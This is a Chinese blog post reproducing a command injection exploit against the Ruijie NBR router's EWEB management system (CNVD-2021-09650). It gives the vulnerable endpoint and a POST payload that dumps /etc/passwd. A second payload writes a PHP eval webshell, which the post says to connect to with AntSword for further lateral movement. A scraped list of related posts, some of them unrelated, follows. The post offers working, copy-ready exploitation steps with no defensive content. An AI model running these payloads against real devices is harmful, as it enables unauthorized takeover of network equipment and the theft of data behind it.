锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell
漏洞编号:
CNVD-2021-09650

漏洞描述:锐捷NBR路由器 EWEB网关系统部分接口存在命令注入,导致远程命令执行获取

漏洞影响:
锐捷NBR路由器 EWEB网关系统

漏洞复现:

首先打开网关系统

然后在URL后面加 /guest_auth/guestIsUp.php,此路径为漏洞存在地。
我们打开hacker Bar,在Post data 输入 mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt
这句代码的意思是使用cat 查看/etc/passwd路径下的passwd 文件,并将内容保存到test.txt

接着我们访问url/test.txt 路径,查看文件。

回显了/etc/passwd路径下passwd文件的内容

利用漏洞文件文件上传。
利用此漏洞我们可以将一句话木马写入sorry.php文件,然后用蚁剑来连接webshell.

漏洞复现:

Payload :
mac=1&ip=127.0.0.1|echo ‘<?php @eval($_POST[‘bb’]) ?>’ > sorry.php

将这句话execute一下。

然后我们直接上蚁剑连接就ok了

这边直接能看到我们上传的webshell

右击终端

然后就可以进一步的横向或者纵向,也可以进一步信息收集。

博客来之不易,还望各位大佬点赞关注,谢谢!
想找安全岗位私信内推哦!

锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell相关推荐

  1. 锐捷NBR路由器远程命令执行漏洞(CNVD-2021-09650)

    漏洞描述 锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限. 漏洞复现 访问锐捷EWEB网管系统界面 使用HackBar执行payload POS ...

  2. 锐捷 NBR路由器 远程命令执行漏洞(CNVD-2021-09650)

    漏洞描述 i ⭐锐捷NBR路由器 EWEB网管系统部分接口存在命令注入,导致远程命令执行获取权限 漏洞影响 s ✅锐捷NBR路由器 EWEB网管系统 空间测绘 d ⭕FOFA:title=" ...

  3. 锐捷NBR路由器命令执行漏洞复现

    锐捷NBR路由器命令执行漏洞 首先先看看页面的样子 2. 这里需要注意的是,由于权限问题,厂商使用的cookie为用户名密码加密使用,什么意思呢? 经过测试,当密码输入错误的时候,部分型号nbr路由器 ...

  4. 【漏洞预警】泛微e-cology OA系统远程代码执行漏洞及其复现

    目录 0x00前言 0x01漏洞描述 0x02漏洞复现 0x03漏洞POC 0x04影响范围 0x05漏洞防护 0x06免责声明 0x00前言 2019年9月19日,泛微e-cology OA系统自带 ...

  5. 华为路由器远程命令执行漏洞复现(CVE-2017-17215)

    华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值. CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞 ...

  6. Dlink路由器 CNVD-2018-01084 远程命令执行漏洞 复现分析

    Dlink路由器 CNVD-2018-01084复现分析 0x01 背景介绍 D-Link DIR 615/645/815路由器1.03及之前的固件版本存在远程命令执行漏洞.该漏洞是由于service ...

  7. 深信服 行为感知系统 c.php 远程命令执行漏洞

    漏洞描述: 深信服 行为感知系统 c.php 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行 漏洞利用条件: / 漏洞影响范围: 行为感知系统 漏洞复现: 1.POC:/tool/log ...

  8. 和信创天云桌面系统远程命令执行

    若天下不定,吾往:​若世道不平,不回! 漏洞描述 和信创天云桌面系统存在默认配置导致文件上传并可以远程命令执行 漏洞影响 和信创天云桌面系统 漏洞复现 构造payload POST /Upload/u ...

  9. 锐捷EG易网关远程命令执行漏洞-1

    文章目录 测试poc payload1-命令执行结果写入文件 payload2-访问写入的文件 简单脚本 这里是在EG易网关中测试出来的,不知NBR路由器是否存在 测试poc /guest_auth/ ...

最新文章

  1. DNN module.css文件不起作用的解决
  2. 岭回归与Lasso回归
  3. dev控件中LookUpEdit的数据绑定问题
  4. mysql租车管理系统_基于java实现租车管理系统
  5. sqlserver limit
  6. SAP License:ERP是什么
  7. c盘怎么清理到最干净_系统垃圾太多,怎么一键彻底清理干净
  8. linux机器的物理内存监控,Linux内存监控工具
  9. 【Django 2021年最新版教程9】数据库查询操作
  10. 计算机二级java考哪些内容_计算机二级考试Java考试内容
  11. BI项目篇——项目启动
  12. 微信登陆、支付接口对接整理
  13. 【游戏开发进阶】玩转贝塞尔曲线,教你在Unity中画Bezier贝塞尔曲线(二阶、三阶),手把手教你推导公式
  14. @JsonProperty
  15. vue项目在ie浏览器下运行显示空白页面
  16. 环洋市场调研-2022年全球一次性餐具市场总体规模及应用细分研究报告
  17. html5制作波浪,技能get:用HTML5实现波浪效果
  18. 十二 iOS之 折叠图片
  19. 无线信道参数估计算法
  20. 视频压缩原理之 预测编码

热门文章

  1. 「Ceph集群部署」多机离线部署
  2. 5分钟包你搞懂箱形图分析!
  3. 华为云设计语言_多云架构落地设计和实施方案【华为云分享】
  4. [魔兽]Grubby兽族的操作编队详解
  5. 影评《北京爱情故事》告诉我们一些事
  6. “小论文”杂谈之二:如何选择一篇好文章
  7. 如何写一封专业的英文电子邮件
  8. 中国文化概论名词解释题
  9. 七大关键数据 移动安全迎来历史转折点
  10. pcie16x能插1x的卡嘛?_任天堂switch联名TF卡上架国行店,售价过高被吐槽,用途同样迷惑...